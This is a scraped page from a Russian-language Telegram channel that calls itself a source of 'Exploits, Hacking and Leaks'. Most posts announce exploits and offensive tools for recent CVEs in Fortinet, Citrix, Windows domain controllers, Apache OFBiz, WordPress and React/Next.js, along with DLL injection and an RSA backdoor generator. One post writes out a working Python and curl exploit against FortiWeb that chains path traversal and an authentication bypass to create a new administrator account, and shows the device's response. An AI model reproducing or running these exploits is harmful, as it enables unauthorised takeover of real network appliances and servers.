Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
76 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
Fortinet FortiWeb
*
auth bypass vuln
*
check vuln
🔥21👍5😱3
CVE-2025-33073
*
POC я уже публиковал, а тут универсалочка подъехала.

Universal exploit

#win #DC #controller
👍17🔥12😱4
CVE-2025-12101 + CVE-2025-21202
*
Citrix NetScaler ADC and Citrix NetScaler Gateway
*
exploit +xss tool
👍11😱3🔥1
CVE-2025-64446 FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass
*
Ну то есть исходя из ЭТОГО
можно получить такое:
python3 - <<'PY'
import base64, json, subprocess
header = base64.b64encode(json.dumps({
"username": "admin",
"profname": "prof_admin",
"vdom": "root",
"loginname": "admin"
}).encode()).decode()

payload = json.dumps({
"data": {
"q_type": 1,
"name": "note2",
"access-profile": "prof_admin",
"password": "note2",
"comment": "automated RCE"
}
})

cmd = [
"curl", "--path-as-is", "-sk",
"-H", f"CGIINFO: {header}",
"-H", "Content-Type: application/json",
"--data", payload,
"https://localhost:38443/api/v2.0/cmdb/system/admin%3f/../../../cgi-bin/fwbcgi"
]
print(subprocess.run(cmd, capture_output=True, text=True).stdout)
PY

Output from the box:

{ "results": { "name": "note2", "access-profile": "prof_admin", ... } }


То есть просто получаем нового админа
🔥40👍3
CVE-2025-59118: Critical Apache OFBiz
*
RCE
*
Full Server Compromise
🔥13👍7
This media is not supported in your browser
VIEW IN TELEGRAM
13:17 пробило
а вот и ОН
happy birthday
день рождения )))
дамы и господа - нам 4 года
*
Если пересказать = многое было, я бы многое изменил, но вышло так как вышло, ну и хорошо.
*|
С днем рождения НАС )))) начнем в 13:17 ))))
Ну, и все как всегда - берегите себя и своих близких ! ))))

Donate^
Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker

С днем нас рождения ))))
👍119🔥80😱4
гоу, увидимся внутри !
👍17🔥13
CVE-2025-6389
is a Critical (CVSS 9.8) vulnerability
in the Sneeit Framework WordPress plugin (≤ 8.3)
exploit

#wordpress
👍16🔥1
Forwarded from Freedom Fox 🏴‍☠
20.11.2025г 00:00 СПБ.

Возрождение, легендарного канала по свободному распространению информации!!! 🏴‍☠
Наши убеждения не выпадают вместе с зубами
🦊

#А_ты_уже_с_нами

«Проект Наследие»

https://news.1rj.ru/str/freedomfox
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥27👍9
This media is not supported in your browser
VIEW IN TELEGRAM
Внедрение DLL в процесс проводника с помощью иконок
*
IconJector
🔥35👍4
крутой сайт !
https://chiptune.app/browse
👍20🔥15😱2
RSA Backdoor Generator
*
Учитывая сколько всего сидит на RSA, потенциал от атаки действительно ЖИРНЫЙ
*
Link
🔥30😱11👍2
Bypassing Next Generation Firewalls with fragtunnel
*
Link
😱27👍13🔥7
CVE-2025-55182
*
(CVSS 10.0) : Catastrophic React Flaw allows Unauthenticated RCE on Next.js and React Server Components.
*
POC
👍19🔥6😱1
LOL
Apple Travel Portal
🔥70😱25
Удобно стало, но поздновато как то

FreeBSD POrts
👍16😱4🔥3
уже и летопись подвезли ))) https://react2shell.com
👍9🔥7😱3